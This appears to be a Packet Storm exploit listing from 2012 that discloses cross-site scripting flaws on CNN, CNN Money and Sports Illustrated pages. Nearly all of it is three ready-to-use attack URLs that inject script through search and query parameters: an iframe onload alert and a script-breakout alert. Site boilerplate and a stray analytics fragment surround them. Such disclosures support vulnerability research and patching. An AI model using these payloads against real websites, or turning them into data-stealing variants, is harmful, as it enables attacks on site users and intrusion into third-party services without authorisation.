Multiple CNN sites suffer from a cross site scripting vulnerability.
096af4011880d288a5647811b198a78701418586dcb30a2927def6dfc9268a09# Exploit Title: CNN XSS
# Date: 14.09.2012
# Author: TayfunBasoglu
# Tested: BackTrack 5
# Platform: html-asp
------------------------------------------------------------------
http://edition.cnn.com/search/index.html?sortBy=date&primaryType=mixed&source=money&query=%22%3E%3Ciframe+onload%3Dalert%28%2FXSS%2F%29%3E
http://money.cnn.com/search/index.html?sortBy=date&primaryType=mixed&source=money&query=%22%3E%3Ciframe+onload%3Dalert%28%2FTayfunBasoglu%2F%29%3E
http://sports.sportsillustrated.cnn.com/racingfront.asp?series=%27%29;%20alert%28%22TayfunBasoglu%22%29;//%3C/script%3E
------------------------------------------------------------------
tayfunbasoglu.blogspot.com
twitter.com/tayfunbasoglu
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed